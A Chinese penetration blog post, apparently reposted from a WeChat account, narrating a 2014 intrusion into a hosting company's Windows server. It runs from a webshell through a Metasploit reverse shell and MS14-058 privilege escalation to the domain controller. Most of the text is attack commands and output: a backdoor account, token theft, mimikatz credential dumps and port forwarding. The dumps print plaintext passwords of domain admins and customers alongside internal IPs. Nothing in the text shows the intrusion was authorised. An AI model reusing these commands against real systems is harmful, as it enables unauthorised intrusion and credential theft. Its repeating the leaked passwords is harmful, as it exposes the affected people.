记一次MS14-058到域控实战记录

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


0x01 前言

Date/time:2014年,这个网站权限是朋友给我的,叫帮忙给看下提权,没去细看他是通过什么漏洞拿到的这个网站权限。在拿到权限以后大致看了下:
wscript.shell组件没被禁用,可直接执行系统命令,支持Aspx脚本,系统补丁658+,不允许跨站,搜集到的目标基本信息如下。

基本信息探测:
端口开放:21、80、135、443、445、3306、3392补丁情况:658+补丁( Win2003 32位系统 )脚本探测:支持Asp,Aspx脚本,不支持Php脚本磁盘权限:C,D盘部分文件夹有可读/写权限(不允许跨站)
记一次MS14-058到域控实战记录


注:除了MySQL没有其他可利用第三方软件,因为安全权限设置的原因也不能跨到MySQL目录,所以暂时无法利用MySQL UDF进行提权。

0x02 实战测试过程

补丁打了600+,明知道成功机率不大,但还是硬着头皮把常用的和以前测试成功过的提权EXP全传上去试了个遍,有一部分提权EXP还没来得及整理编号。
pr.exeChurrasco.exe,2003.exeNDProxy.exeiis6.exeMS11-046.exeMS10-048.exeMS11-080.exeMS13-051.exedebug.exe

除了最后测试的MS14-058.exe成功,其它全都失败了,虽然MS14-058成功利用,但是在测试中发现只能执行whoami,其它命令或者.bat、.vbs等文件在执行后都没有回显。
记一次MS14-058到域控实战记录

正是因为如此,我们不得不尝试使用Metasploit进行提权,否则还真没有什么提权思路了。生成个攻击载荷(Msf基础知识在前面已经讲了很多了,不再重复讲了),反弹得到Meterpreter会话。
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1x3.2x1.x0.1x8 LPORT=443 R | msfencode -t aspx -o /media/sf_Temp/test.aspx
[email protected]:~# msfconsole -qmsf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.1.10msf exploit(handler) > set lport 443msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.10:443[*] Starting the payload handler...[*] Sending stage (770048 bytes) to 216.**.***.9[*] Meterpreter session 1 opened (192.168.1.10:443 -> 216.**.***.9:2159) at 2014-12-29 04:11:44 +0800
记一次MS14-058到域控实战记录

查看当前会话权限、系统信息,尝试使用getsystem提权,没有成功,将当前会话放置后台运行,继续加载ms14_058_track_popup_menu提权模块进行测试。
meterpreter > getuidServer username: TRESSAIWPD_194(lobom0)meterpreter > getsystem[-] priv_elevate_getsystem: Operation failed: Access is denied.meterpreter > sysinfoComputer        : TRESSAOS              : Windows .NET Server (Build 3790, Service Pack 2).Architecture    : x86System Language : en_USMeterpreter     : x86/win32meterpreter > background[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menumsf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcpmsf exploit(ms14_058_track_popup_menu) > set lhost 1x3.2x1.x0.1x8msf exploit(ms14_058_track_popup_menu) > set lport 443msf exploit(ms14_058_track_popup_menu) > set session 1msf exploit(ms14_058_track_popup_menu) > exploit
[-] Handler failed to bind to 1x3.2x1.x0.1x8:443[*] Started reverse handler on 0.0.0.0:443[*] Launching notepad to host the exploit...[+] Process 84492 launched.[*] Reflectively injecting the exploit DLL into 84492...[*] Injecting exploit into 84492...[*] Exploit injected. Injecting payload into 84492...[*] Payload injected. Executing exploit...[*] Sending stage (770048 bytes) to 216.**.***.9[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Meterpreter session 2 opened (192.168.1.10:443 -> 216.**.***.9:3037) at 2014-12-29 04:16:29 +0800
记一次MS14-058到域控实战记录
记一次MS14-058到域控实战记录

注:如果该提权模块显示利用成功,但并没有得到Metpreter会话,这可能是因为目标服务器上安装了诸如安全狗、麦咖啡或者什么其它的安全防护软件,以前多次遇到过这种情况,缺图。

msf exploit(ms14_058_track_popup_menu) > exploit 
[-] Handler failed to bind to 1x3.2x1.x0.1x8:443[*] Started reverse handler on 0.0.0.0:443[*] Launching notepad to host the exploit...[+] Process 84492 launched.[*] Reflectively injecting the exploit DLL into 84492...[*] Injecting exploit into 84492...[*] Exploit injected. Injecting payload into 84492...[*] Payload injected. Executing exploit...[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Exploit completed, but no session was created

再次通过getuid命令查询当前权限时发现已经是“NT AUTHORITYSYSTEM”权限了,然后将当前会话进程迁移至PID为2796进程中,缺图。

meterpreter > getuidServer username: NT AUTHORITYSYSTEMmeterpreter > ps PID    PPID   Name                   Arch  Session     User                       Path ---    ----   ----                   ----  -------     ----                       ----... 2796   580    searchindexer.exe      x86   0           NT AUTHORITYSYSTEM        C:WINDOWSsystem32SearchIndexer.exe 67360  40764  notepad.exe            x86   0           NT AUTHORITYSYSTEM        C:WINDOWSsystem32notepad.exe...
meterpreter > migrate 2796[*] Migrating from 67360 to 2796...[*] Migration completed successfully.

使用ipconfig命令查看当前目标主机上的IP信息时发现有两张网卡,一个是172.16.19.152内网的,一个是多IP(216.**.***.9/64.**.***.229/209.200.***.***)公网的,缺图。
meterpreter > ipconfig
Interface 1============Name : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU : 1520IPv4 Address : 127.0.0.1
Interface 65539============Name : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 - Packet Scheduler MiniportHardware MAC : 84:2b:2b:6b:45:11MTU : 1500IPv4 Address : 172.16.19.152IPv4 Netmask : 255.255.252.0
Interface 65540============Name : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #3 - Packet Scheduler MiniportHardware MAC : 84:2b:2b:6b:45:0fMTU : 1500IPv4 Address : 216.***.***.9IPv4 Netmask : 255.255.255.0IPv4 Address : 64.**.***.229IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 216.**.***.113IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0

这里我们先用Metasploit中的enable_support_account模块在系统中留一个后门帐户,也可以用hashdump、mimikatz等命令获取目标主机的哈希和明文密码,缺图。

  • User:SUPPORT_388945a0

  • Pass:7a57a5a743894a0e

msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_accountmsf post(enable_support_account) > set password 7a57a5a743894a0emsf post(enable_support_account) > set session 2msf post(enable_support_account) > exploit[*] Target OS is Windows .NET Server (Build 3790, Service Pack 2).[*] Harvesting users...[+] Found SUPPORT_388945a0 account![*] Target RID is 1004[*] Account is disabled, activating...[*] Swapping RIDs...![*] Setting password to 7a57a5a743894a0e[*] Post module execution completed

用于远程桌面连接的3389端口被管理员修改过了,根据经验猜测3392应该是修改后的端口号,在远程连接界面看到存在域,说明这台机器在HOSTING域内。

Webshell执行域信息搜集相关命令时会提示:System error 5 has occurred . Access is denied . 。访问被拒绝,权限问题。
ipconfig /all              //网卡配置信息,所属域以及IP段ping backbox               //显示该机器名的IPnet view                   //显示当前域中的计算机列表net view /domain           //查看有多少个域net user /domain           //获取所有域用户列表net group /domain                     //获取域用户组信息net group "domain admins" /domain     //获取当前域管理员net time /domain                      //域服务器一般也做时间服务器dsquery server                        //查看域控服务器dsquery subnet                        //查看域IP地址范围

记一次MS14-058到域控实战记录


因为meterpreter会话2里已经是SYSTEM权限了,所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息,缺图。
msf post(enable_support_account) > sessions -i 2[*] Starting interaction with 2...
meterpreter > shellProcess 13204 created.Channel 2 created.Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.
c:windowssystem32inetsrv>net group "domain admins" /domainnet group "domain admins" /domainThe request will be processed at a domain controller for domain hosting.lunarpages.com.
Group name Domain AdminsComment Designated administrators of the domain
Members-------------------------------------------------------------------------------_new_win_user abbas.khan akumaralexb alext brianldgreathouse dimitriosk epakgcager gudiyak iismonJassi jayraju jmicklelunarscripts mike mwaqasrichardd robotdoggy rodbTsinternetuser vartamonov vlaszlozafrilThe command completed successfully.

使用dsquery server命令查询域控制器中有一个PHART,在域信息搜集时也发现HOSTING域内有一台计算机名为PHART的机器,所以这台机器应该是域控服务器,对应的IP地址为:172.16.17.208
c:windowssystem32inetsrv>dsquery server"CN=THART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com""CN=PHART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com"

====== Domain:HOSTING(域内机器)======
\ARCTURUS = [172.16.17.176]\BASH = [172.16.17.197]\BLAMO = [172.16.17.112]\CASTOR = [172.16.19.62]\CELANEO = [172.16.17.221]\CEPHEI = [172.16.17.177]\INDUS = [172.16.18.30]\KENDAL-NEW = [172.16.16.55]\KRAZ = [216.***.***.207]\PHART = [172.16.17.208]\RAPTOR = [172.16.17.199]\REGOR = [216.***.***.206]\ROCKET = [172.16.16.120]\SM-MAIL2-N14 = [172.16.19.129]\SMARTERMAIL1 = [172.16.16.129]\TRESSA = [216.**.***.9]\TUB = [172.16.19.72]\VOGA = [67.***.***.33]\VPSSQL12 = [172.16.18.169]\YED = [216.***.***.203]

加载incognito扩展,它可以用来盗窃目标主机令牌和假冒用户,列出目标主机可用令牌,可以看到有2个域管帐号:HOSTINGdimitriosk,HOSTINGrichardd。

meterpreter > use incognitoiLoading extension incognito...success.meterpreter > list_tokens -u
Delegation Tokens Available========================================NT AUTHORITYLOCAL SERVICENT AUTHORITYNETWORK SERVICENT AUTHORITYSYSTEMTRESSAcodeb7TRESSAIWAM_plesk(default)TRESSAIWPC_10(techb7)TRESSAIWPC_112(techn56)TRESSAIWPC_120(csbelts2)......Impersonation Tokens Available========================================HOSTINGdimitrioskHOSTINGricharddNT AUTHORITYANONYMOUS LOGONTRESSAIUSR_baffledcomics23TRESSAIUSR_bridgcaTRESSAIUSR_canva4TRESSAIUSR_cellu12......


接着我们使用mimikatz法国神器直接就能获取到了这2个域管帐号的明文密码,缺图。

meterpreter > wdigest[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================
AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE0;54487 NTLM0;141544 NTLM TRESSA IWPD_323(jielu0) 1pDH40;146820 NTLM TRESSA IWPD_276(codeb7) 2FRj#0;150429 NTLM TRESSA psaadm 2a 00 6d 00 48 00 6a 00 40 bc0;146362 NTLM TRESSA IWPD_73(birch11) 2a)hx0;145281 NTLM TRESSA IWPD_404(apsns0) [email protected]!0;999 Negotiate HOSTING TRESSA$ 37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 520;996 Negotiate NT AUTHORITY NETWORK SERVICE 37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 520;143168 NTLM TRESSA IWPD_130(leopo1) A^Xku0;150476 NTLM TRESSA IWPD_390(myp3n0) AehD80;50614744 Kerberos HOSTING richardd B0unc3d0;87605279 Kerberos HOSTING richardd B0unc3d0;143575 NTLM TRESSA IWPD_231(rmhar0) BARrc0;150196 NTLM TRESSA IWPC_184(e2esoft0) C9rFi0;1669440 NTLM TRESSA Plesk Administrator HOB.5Sd3X88C610rxYL/06.U0UbihUoU0;148004 NTLM TRESSA IWPD_413(manuf5) I1)cd0;147957 NTLM TRESSA IWPD_375(cellu12) I6oS)0;63839802 Kerberos HOSTING dimitriosk [email protected]#0;56964817 Kerberos HOSTING dimitriosk [email protected]#0;143880 NTLM TRESSA IWPD_179(ringb2) U&RQo0;144397 NTLM TRESSA IWPD_427(temp02) Uj$Da0;49263709 NTLM TRESSA SvcCWRSYNC XgXS0fJkki11200;49609545 NTLM TRESSA SvcCWRSYNC XgXS0fJkki11200;147191 NTLM TRESSA IWPD_334(egorov0) agA+L0;147850 NTLM TRESSA IWPD_399(smash11) btj#c0;82470376 NTLM TRESSA codeb7 codebroker10;145375 NTLM TRESSA IWPD_48(obser14) d(nlK0;144068 NTLM TRESSA IWPD_302(donas0) d-1!j0;56760168 NTLM TRESSA robotdoggy xhn?O8kx!K0;87616530 NTLM TRESSA robotdoggy xhn?O8kx!K0;149472 NTLM TRESSA IWPD_290(expos12) xula)0;147761 NTLM TRESSA IWPD_417(marig4) yy=^(......

域控服务器的IP地址、帐号密码都到手了,接下来就是使用meterpreter的portfwd命令进行端口转发并连接进入域控服务器就行了,域控服务器的远程桌面连接端口也改为了3392。

这里笔者在测试时是可以成功登录到域控服务器及域控下的所有机器,这里就不再截图了。
meterpreter > portfwd add -l 1234 -r 172.16.17.208 -p 3392[*] Local TCP relay created: 0.0.0.0:1234 <-> 172.16.17.208:3392
meterpreter > portfwd delete -l 1234 //删除

0x03 一处问题测试

原笔者想直接通过Metasploit下的exploit/windows/smb/psexec模块使用其中一个域管理员进行批量登录测试的,但是在测试过程中发现总是会出现 以下报错信息。
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.10:443[*] Connecting to the server...[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.16.17.208:445).

记一次MS14-058到域控实战记录


通过在本地2008虚拟机中测试发现,开启Windows防火墙时使用psexec模块返回的就是这个报错。用DOS命令(net stop "Windows Firewall")停止防火墙服务依旧提示一样的报错,但将Windows防火墙关闭后即可成功得到会话,重新启用防火墙后又会断开会话 ~.~ 。
msf exploit(handler) > use exploit/windows/smb/psexecmsf exploit(psexec) > set payload windows/meterpreter/bind_tcpmsf exploit(psexec) > set SMBUSER administratormsf exploit(psexec) > set SMBPASS windows****[email protected]#123msf exploit(psexec) > set RHOST 192.168.1.9msf exploit(psexec) > set LPORT 4444msf exploit(psexec) > exploit
[*] Started bind handler[*] Connecting to the server...[*] Authenticating to 192.168.1.9:445|WORKGROUP as user 'administrator'...[*] Uploading payload...[*] Created TFPRuonH.exe...[+] 192.168.1.9:445 - Service started successfully...[*] Deleting TFPRuonH.exe...[*] Sending stage (770048 bytes) to 192.168.1.9[*] Meterpreter session 6 opened (192.168.1.10:60880 -> 192.168.1.9:4444) at 2014-12-29 20:12:56 +0800
记一次MS14-058到域控实战记录
记一次MS14-058到域控实战记录

本文始发于微信公众号(渗透攻击红队):记一次MS14-058到域控实战记录

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: